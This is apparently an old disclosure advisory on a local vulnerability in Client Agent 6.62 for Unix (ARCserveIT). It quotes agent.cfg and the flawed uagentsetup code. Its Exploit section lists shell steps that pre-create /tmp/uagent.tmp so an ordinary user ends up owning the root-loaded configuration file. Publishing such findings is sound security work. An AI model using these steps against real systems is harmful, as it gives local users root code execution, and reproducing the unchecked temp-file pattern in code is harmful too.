clientagent662.txt

`Client Agent 6.62 for Unix Vulnerability  
Tested on a Debian 2.2.14  
  
Introduction  
--------------  
Client Agent has a hole allowing to execute an arbitrary code by root  
without its knowing. In the meantime, some conditions are necessary to  
exploit this vulnerability.  
  
Description  
------------  
Client Agent is used with ARCserveIT, the safe software. It must be installed  
on all the workstations. A global configuration file agent.cfg keep every  
sub-agents installed on your system. This file is in /usr/CYEagent, and receive  
the information from the sub-agent when the script /opt/uagent/uagensetup is run.  
  
uagent.cfg:  
  
debian:/usr/CYEagent# more agent.cfg  
#  
#(c) Copyright 1989-1999 Computer Associates International, Inc.  
#and/or its subsidiaries. All Rights Reserved. Use by the United  
#States Government is subject to RESTRICTED RIGHTS as set out in  
#the license agreement.  
#  
  
[0]  
#[UAGENT]  
NAME Uagent  
VERSION 5.0.0  
HOME /opt/uagent  
#ENV CHEY_ENV_DEBUG_LEVEL=4  
ENV LD_LIBRARY_PATH=/usr/local/CAlib:/usr/CYEagent:$LD_LIBRARY_PATH  
ENV SHLIB_PATH=/usr/local/CAlib:/usr/CYEagent:$SHLIB_PATH  
ENV LIBPATH=/usr/local/CAlib:/usr/CYEagent:$LIBPATH  
BROWSER asbr  
AGENT uagentd  
MERGE umrgd  
VERIFY umrgd  
  
where asbr, uagentd, and umgrd are programms in /opt/uagent  
  
Client Agent is vulnerable only if uagentsetup is run a second time. The first time,  
it creates the folder /usr/CYEagent and the file agent.cfg, but after it creates  
a backup of agent.cfg and creates a new agent.cfg without checking permissions.  
  
The code in /opt/uagent/uagentsetup :  
  
# append lines  
#  
case $ANS in  
y|Y|yes|YES|Yes)  
cat ${UAGENT_HOME}/.agent.cfg >> ${TMPFILE} || exit 2  
${ECHO} >> ${TMPFILE} || exit 2  
mv ${TMPFILE} $dest || exit 2 <------------  
;;  
esac  
  
So anyone can control this file. The modifications to this file will be used when  
the sub-agent will be stopped and restarted.  
  
Exploit  
--------  
  
[zorgon@debian /]$ cd /tmp  
[zorgon@debian /tmp]$ touch uagent.tmp  
[zorgon@debian /tmp]$ chmod 700 uagent.tmp  
  
If uagentsetup is run a second time :  
  
[zorgon@debian /]$ ls -lag /usr/CYEagent/  
total 176  
drwxr-xr-x 3 root root 4096 Jul 19 17:46 .  
drwxr-xr-x 15 root root 4096 Jul 11 10:37 ..  
-rw-r--r-- 1 zorgon users 618 Jul 19 17:47 agent.cfg  
-rw-r--r-- 1 root root 618 Jul 19 17:47 agent.cfg.old  
-rwxr-xr-x 1 root root 16899 Jul 11 10:37 asagent  
-rwxr-xr-x 1 root root 105280 Jul 11 10:37 asagentd  
lrwxrwxrwx 1 root root 11 Jul 12 10:54 li -> /usr/lib/li  
-rwxr-xr-x 1 root root 27878 Jul 19 17:47 libarclic98_api.so  
drwxr-xr-x 3 root root 4096 Jul 11 10:37 nls  
[zorgon@debian /]$  
  
  
  
==================================  
zorgon <[email protected]>  
http://www.nightbird.free.fr  
----------------------  
Do you do Linux? :)   
Get your FREE @linuxstart.com email address at: http://www.linuxstart.com  
`